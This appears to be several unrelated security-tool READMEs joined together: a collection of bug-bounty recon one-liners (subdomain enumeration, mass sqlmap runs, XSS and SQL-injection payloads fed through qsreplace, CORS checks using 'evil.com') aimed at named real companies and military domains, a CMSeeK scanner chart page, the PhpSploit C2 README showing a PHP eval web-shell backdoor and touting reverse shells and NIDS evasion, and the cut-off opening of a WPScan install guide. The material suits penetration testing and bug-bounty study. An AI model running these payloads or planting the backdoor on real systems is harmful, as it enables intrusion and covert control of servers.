[Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: 2021 iteratec GmbH SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is CMSeeK? CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and it's installed extensions. We use it to scan Joomla CMS. It also has a database with known vulnerabilities. To learn more about the CMSeeK scanner itself visit [https://github.com/Tuhinshubhra/CMSeeK]. ## Deployment The cmseek chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install cmseek secureCodeBox/cmseek ``` ## Scanner Configuration The CMSeeK targets are specified with the `-u` parameter. The target should be a hostname or an IP address. Additional CMSeeK scan features can be configured via the parameter attribute. Some useful example parameters listed below: - `-u URL, --url URL` : Target Url. - `--follow-redirect` : Follows all/any redirect(s). - `--no-redirect` : kips all redirects and tests the input target(s) - `-r, --random-agent`: Use a random user agent. - `--googlebot`: Use Google bot user agent. - `--user-agent USER_AGENT`: Specify a custom user agent ## Requirements Kubernetes: `>=v1.11.0-0`
<p align="center"> <a href="https://github.com/nil0x42/phpsploit" alt="master"> <img src="data/img/logo.png" alt="Master"> </a> </p> <h3 align="center"> Full-featured C2 framework which silently persists on <br>webserver via polymorphic PHP oneliner <a href="https://twitter.com/intent/tweet?text=PhpSploit%2C%20Full-featured%20C2%20framework%20which%20silently%20persists%20on%20webserver%20via%20polymorphic%20PHP%20oneliner%20-%20by%20@nil0x42&url=https://github.com/nil0x42/phpsploit"> <img src="https://img.shields.io/twitter/url?label=tweet&logo=twitter&style=social&url=http%3A%2F%2F0" alt="tweet"> </a> </h3> <br> <p align="center"> <a href="https://github.com/nil0x42/phpsploit/actions/workflows/unit-tests.yml?query=branch%3Amaster"> <img src="https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/unit-tests.yml?label=tests&logo=githubactions" alt="Unit Tests workflow"> </a> <a href="https://github.com/nil0x42/phpsploit/network/dependencies#requirements.txt"> <img src="https://img.shields.io/badge/dependabot-ok-aaf?logo=dependabot&logoColor=aaf" alt="Dependabot status"> </a> <a href="https://app.codacy.com/gh/nil0x42/phpsploit/dashboard"> <img src="https://img.shields.io/codacy/grade/f8514058aec04ad98727c79701bc042a?logo=codacy&logoColor=green" alt="codacy code quality"> </a> <a href="https://github.com/nil0x42/phpsploit/actions/workflows/codeql-analysis.yml?query=branch%3Amaster"> <img src="https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/codeql-analysis.yml?label=codeql&logo=lgtm&logoColor=ff0&color=af8" alt="CodeQL workflow"> </a> <a href="https://codecov.io/gh/nil0x42/phpsploit"> <img src="https://img.shields.io/codecov/c/github/nil0x42/phpsploit?color=orange&label=coverage&logo=codecov" alt="codecov coverage"> </a> <a href="https://codeclimate.com/github/nil0x42/phpsploit/maintainability"> <img src="https://api.codeclimate.com/v1/badges/6986200c1729b4a70a40/maintainability" alt="codeclimate maintainability"> </a> </p> <p align="center"> <a href="https://github.com/enaqx/awesome-pentest"> <img src="https://awesome.re/mentioned-badge.svg"> </a> <a href="https://www.kali.org/tools/phpsploit/"> <img src="https://img.shields.io/static/v1?label=Kali%20Linux&message=packaged&color=red&logo=kalilinux&logoColor=ff0"> </a> <a href="https://www.blackarch.org/webapp.html"> <img src="https://img.shields.io/static/v1?label=BlackArch&message=packaged&color=red&logo=archlinux&logoColor=006"> </a> <a href="https://twitter.com/intent/follow?screen_name=nil0x42" target="_blank"> <img src="https://img.shields.io/twitter/follow/nil0x42.svg?logo=twitter"> </a> </p> <div align="center"> <sub> Created by <a href="https://twitter.com/nil0x42">nil0x42</a> and <a href="https://github.com/nil0x42/phpsploit#contributors">contributors</a> </sub> </div> <br> * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * <p align="center"> <img src="data/img/demo.png"> </p> #### Overview The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny **polymorphic backdoor**: ```php <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?> ``` * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * #### Quick Start ```sh git clone https://github.com/nil0x42/phpsploit cd phpsploit/ pip3 install -r requirements.txt ./phpsploit --interactive --eval "help help" ``` * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * #### Features - **Efficient**: More than 20 plugins to automate privilege-escalation tasks - Run commands and browse filesystem, bypassing PHP security restrictions - Upload/Download files between client and target - Edit remote files through local text editor - Run SQL console on target system - Spawn reverse TCP shells - **Stealth**: The framework is made by paranoids, for paranoids - Nearly invisible by log analysis and NIDS signature detection - Safe-mode and common _PHP security restrictions bypass_ - Communications are hidden in HTTP Headers - Loaded payloads are obfuscated to _bypass NIDS_ - http/https/socks4/socks5 **Proxy support** - **Convenient**: A robust interface with many crucial features - Detailed help for any option (`help` command) - _Cross-platform_ on both client and server. - CLI supports auto-completion & multi-command - Session saving/loading feature & persistent history - Multi-request support for large payloads (such as uploads) - Provides a powerful, highly configurable settings engine - Each setting, such as user-agent has a _polymorphic mode_ - Customisable environment variables for plugin interaction - Provides a complete plugin development API * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * #### Supported platforms (as attacker): - GNU/Linux - Mac OS X #### Supported platforms (as target): - GNU/Linux - BSD-like - Mac OS X - Windows NT ## Contributors <!-- [![](https://contrib.rocks/image?repo=nil0x42/phpsploit)](https://github.com/nil0x42/phpsploit/graphs/contributors) --> <!-- <details> --> <!-- <summary><b>:trophy: All contributors</b></summary> --> Thanks goes to these wonderful people: <!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --> <!-- prettier-ignore-start --> <!-- markdownlint-disable --> <table> <tr> <td align="center"><a href="https://exdemia.com"><img src="https://avatars1.githubusercontent.com/u/3504393?v=4" width="100px;" alt=""/><br /><sub><b>nil0x42</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/commits?author=nil0x42" title="Code">💻</a> <a href="#infra-nil0x42" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a> <a href="#plugin-nil0x42" title="Plugin/utility libraries">🔌</a> <a href="https://github.com/nil0x42/phpsploit/commits?author=nil0x42" title="Tests">⚠️</a></td> <td align="center"><a href="https://github.com/shiney-wh"><img src="https://avatars1.githubusercontent.com/u/20907184?v=4" width="100px;" alt=""/><br /><sub><b>shiney-wh</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/commits?author=shiney-wh" title="Code">💻</a> <a href="#plugin-shiney-wh" title="Plugin/utility libraries">🔌</a></td> <td align="center"><a href="http://wapiflapi.github.io"><img src="https://avatars3.githubusercontent.com/u/1619783?v=4" width="100px;" alt=""/><br /><sub><b>Wannes Rombouts</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/commits?author=wapiflapi" title="Code">💻</a> <a href="#maintenance-wapiflapi" title="Maintenance">🚧</a></td> <td align="center"><a href="http://yurilz.com"><img src="https://avatars1.githubusercontent.com/u/6031769?v=4" width="100px;" alt=""/><br /><sub><b>Amine Ben Asker</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/commits?author=yurilaaziz" title="Code">💻</a> <a href="#maintenance-yurilaaziz" title="Maintenance">🚧</a></td> <td align="center"><a href="http://twitter.com/jnazario"><img src="https://avatars1.githubusercontent.com/u/5619153?v=4" width="100px;" alt=""/><br /><sub><b>jose nazario</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/commits?author=paralax" title="Documentation">📖</a> <a href="https://github.com/nil0x42/phpsploit/issues?q=author%3Aparalax" title="Bug reports">🐛</a></td> <td align="center"><a href="http://wikisecure.net"><img src="https://avatars3.githubusercontent.com/u/156915?v=4" width="100px;" alt=""/><br /><sub><b>Sujit Ghosal</b></sub></a><br /><a href="#blog-sujit" title="Blogposts">📝</a></td> <td align="center"><a href="https://github.com/sohelzerdoumi"><img src="https://avatars3.githubusercontent.com/u/3418725?v=4" width="100px;" alt=""/><br /><sub><b>Zerdoumi</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/issues?q=author%3Asohelzerdoumi" title="Bug reports">🐛</a></td> </tr> <tr> <td align="center"><a href="https://github.com/tristandostaler"><img src="https://avatars3.githubusercontent.com/u/5489330?v=4" width="100px;" alt=""/><br /><sub><b>tristandostaler</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/issues?q=author%3Atristandostaler" title="Bug reports">🐛</a></td> <td align="center"><a href="https://github.com/rohantarai"><img src="https://avatars3.githubusercontent.com/u/16543074?v=4" width="100px;" alt=""/><br /><sub><b>Rohan Tarai</b></sub></a><br /><a href="https://github.com/nil0x42/phpsploit/issues?q=author%3Arohantarai" title="Bug reports">🐛</a></td> <td align="center"><a href="https://triop.se"><img src="https://avatars1.githubusercontent.com/u/190150?v=4" width="100px;" alt=""/><br /><sub><b>Jonas Lejon</b></sub></a><br /><a href="#blog-jonaslejon" title="Blogposts">📝</a></td> </tr> </table> <!-- markdownlint-enable --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END --> This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome <!-- </details> -->
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png "WPScan - WordPress Security Scanner") [![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan) [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan) [![Code Climate](https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg)](https://codeclimate.com/github/wpscanteam/wpscan) [![Patreon Donate](https://img.shields.io/badge/patreon-donate-green.svg)](https://www.patreon.com/wpscan) # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.3 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.21 - Recommended: latest - The 7.29 has a segfault - RubyGems - Recommended: latest ### From RubyGems (Recommended) ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity 